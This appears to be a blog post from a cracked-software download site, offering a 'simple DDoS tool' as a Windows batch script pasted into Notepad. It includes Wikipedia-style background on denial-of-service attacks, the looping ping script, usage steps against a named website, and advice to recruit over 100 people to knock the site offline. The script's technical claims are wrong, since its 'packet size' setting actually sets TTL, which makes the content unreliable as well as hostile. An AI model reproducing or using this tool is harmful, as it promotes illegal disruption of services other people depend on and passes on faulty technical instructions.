Free download Games, software full version, Crack, Patch, Movies, and many more. Feel Free your download.

How to Make a Simple DDoS Tools By Using Notepad


In computing, a denial-of-service (DoS) or distributed denial-of-service (DDoS) attack is an attempt to make a machine or network resource unavailable to its intended users. Although the means to carry out, motives for, and targets of a DoS attack may vary, it generally consists of efforts to temporarily or indefinitely interrupt or suspend services of a host connected to the Internet. As clarification, DDoS (Distributed Denial of Service) attacks are sent by two or more persons, or bots. (See botnet) DoS (Denial of Service) attacks are sent by one person or system.

Perpetrators of DoS attacks typically target sites or services hosted on high-profile web servers such as banks, credit card payment gateways, and even root nameservers. DoS threats are also common in business, and are sometimes responsible for website attacks. This technique has now seen extensive use in certain games, used by server owners, or disgruntled competitors on games, such as server owners' popular Minecraft servers. Increasingly, DoS attacks have also been used as a form of resistance. Richard Stallman has stated that DoS is a form of 'Internet Street Protests’. The term is generally used relating to computer networks, but is not limited to this field; for example, it is also used in reference to CPU resource management.

One common method of attack involves saturating the target machine with external communications requests, so much so that it cannot respond to legitimate traffic, or responds so slowly as to be rendered essentially unavailable. Such attacks usually lead to a server overload. In general terms, DoS attacks are implemented by either forcing the targeted computer(s) to reset, or consuming its resources so that it can no longer provide its intended service or obstructing the communication media between the intended users and the victim so that they can no longer communicate adequately.
Denial-of-service attacks are considered violations of the Internet Architecture Board's Internet proper use policy, and also violate the acceptable use policies of virtually all Internet service providers. They also commonly constitute violations of the laws of individual nations.

Screenshots :



Steps :
1. Copy This Code :
@echo off
mode 67,16
DDoS Attack by AnonCyber-Blog
color 0a
cls
echo.
echo DDOS With Batchfile
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
: DDOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS
2. Open NotePad from your computer.
3. Paste the code to your NotePad.
4. Save the file with .bat ext. (ex:DDoS Tools.bat)

How To Use :
1. Open the file.(remember,you must connecting to internet)
2. You will see "Server-Target",type the link/website address without http:// (ex:www.google.com) and then press Enter.
3. You will see like this :  
Pinging www.google.com
[209.85.175.106] with 32 bytes of data:
Reply from 209.85.175.106: bytes=32 time=30ms TTL=56
Reply from 209.85.175.106: bytes=32 time=40ms TTL=55
Reply from 209.85.175.106: bytes=32 time=24ms TTL=56
Reply from 209.85.175.106: bytes=32 time=36ms TTL=56
Ping statistics for 209.85.175.106:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 24ms, Maximum = 40ms, Average = 32ms
209.85.175.106 > this is the site's IP.
4. After that you will see : Ip Host. Enter the IP Address below and then press Enter.
5. for Packet Size,you must fill it with number more number it mean better. (ex:1000000).
6. You will see Attacking Server status.
7. Just wait untill the site down.

Remember : You can't do a DDoS Attack alone,you must ask your friend to help you at least 100 people or more / more than 10 PC and 1 PC must run more than 1 DDoS Tools to make your attack more efficient and the site will down easily.




3 komentar:

Anonymous said...

Nice share mas..
:b :b: :b: :b: :b:

solder uap said...

terimakasih artikelnya min...
solder uap

Anonymous said...

HOW TO GET THE IP ADRESS

How to Make a Simple DDoS Tools By Using Notepad